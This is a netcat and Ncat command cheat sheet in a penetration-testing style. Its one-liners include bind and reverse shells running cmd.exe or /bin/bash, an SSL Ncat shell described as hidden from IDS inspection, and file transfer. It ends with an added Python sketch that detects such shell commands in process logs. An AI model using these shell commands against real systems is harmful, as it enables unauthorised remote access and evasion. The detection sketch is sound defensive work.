Netcat

  • Netcat lets you read from and write to TCP and UDP connections.
  • Connect to a POP3 mail server:
nc -nv xxx.xxx.xxx.xxx 110
  • Listen on a TCP port (add -u for UDP):
nc -nlvp 4444
  • Connect to a netcat (or other) port:
nc -nv xxx.xxx.xxx.xxx 4444
  • Send/transfer a file using netcat:
nc -nv xxx.xxx.xxx.xxx 4444 < /usr/share/windows-binaries/wget.exe
  • And vice versa, to receive a file using netcat:
nc -nlvp 4444 > wget.exe

NOTE: Some OSs (OpenBSD) use nc.traditional rather than nc, so watch out for that:

whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
# You can still abuse it:
/bin/nc.traditional -e /bin/bash xxx.xxx.xxx.xxx 4444

Shells:

  • Create a bind shell with Ncat using cmd.exe on Windows:
nc.exe -nlvp 4444 -e cmd.exe
  • Create a reverse shell:
nc.exe -nv xxx.xxx.xxx.xxx 4444 -e cmd.exe
  • Create a reverse shell with Ncat using bash on Linux:
nc -nv xxx.xxx.xxx.xxx 4444 -e /bin/bash
  • Netcat for Banner Grabbing:
echo "" | nc -nv -w1 xxx.xxx.xxx.xxx <port>

Ncat (Netcat for the 21st Century)

  • Ncat is the Nmap project's updated version of netcat. It adds security features such as SSL, and because SSL encrypts the session, an IDS that inspects traffic content cannot see what is sent. For more information, visit https://nmap.org/ncat/. A portable version exists and should be included in Kali.

  • Shell from Windows using cmd.exe over SSL (this command listens with -l, so it is a bind shell; --allow limits which address may connect):
ncat --exec cmd.exe --allow xxx.xxx.xxx.xxx -vnl 4444 --ssl
  • Connect to port 4444 using SSL:
ncat -v xxx.xxx.xxx.xxx 4444 --ssl
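
Added example (not part of the original cheat sheet): a host-side detection sketch that flags process command lines in which netcat or Ncat is told to run a program (-e, -c, --exec, --sh-exec) and labels each hit as a bind or reverse shell from the listen flag. Because --ssl hides the session content from network inspection, process telemetry is where this use stays visible. The function names, the sample events and the 192.0.2.10 address are constructed for illustration.

```python
import shlex

# Basenames used on this page; renamed copies are missed (assumes full command lines are logged).
NC_NAMES = {"nc", "nc.exe", "nc.traditional", "netcat", "ncat", "ncat.exe"}

def classify(cmdline):
    """Return None, or (kind, program, uses_ssl) for a netcat run that executes a program."""
    try:
        argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:                            # unbalanced quotes in the log line
        argv = cmdline.split()
    exe = argv[0].strip("\"'").replace("\\", "/") if argv else ""
    if exe.rsplit("/", 1)[-1].lower() not in NC_NAMES:
        return None
    args, listen, ssl, program = argv[1:], False, False, None
    for i, arg in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if arg.startswith("--"):
            opt, _, val = arg[2:].partition("=")
            listen |= opt == "listen"
            ssl |= opt == "ssl"
            if opt in ("exec", "sh-exec"):
                program = val or nxt
        elif arg.startswith("-") and len(arg) > 1:
            flags = arg[1:]                       # bundled short flags, e.g. -nlvp
            listen |= "l" in flags
            for f in "ec":                        # -e / -c: run a program or shell command
                if f in flags:
                    program = flags[flags.index(f) + 1:] or nxt
    if program is None:
        return None                               # plain client or listener, nothing executed
    return ("bind shell" if listen else "reverse shell", program.strip("\"'"), ssl)

# Constructed process-creation command lines (192.0.2.10 is a documentation address).
SAMPLE_EVENTS = [
    "nc -nv 192.0.2.10 110",
    "nc -nlvp 4444",
    r"C:\Tools\nc.exe -nlvp 4444 -e cmd.exe",
    "/bin/nc.traditional -e /bin/bash 192.0.2.10 4444",
    "ncat --exec cmd.exe --allow 192.0.2.10 -vnl 4444 --ssl",
    "ncat -v 192.0.2.10 4444 --ssl",
]

def scan(events):
    """Return (command line, finding) pairs for the events that were flagged."""
    return [(e, f) for e in events if (f := classify(e))]

if __name__ == "__main__":
    print(*scan(SAMPLE_EVENTS), sep="\n")
```

Short-flag parsing here is a heuristic: an option value attached to its flag (for example an output file name) can contain the letters it looks for, so treat hits as leads to triage rather than verdicts.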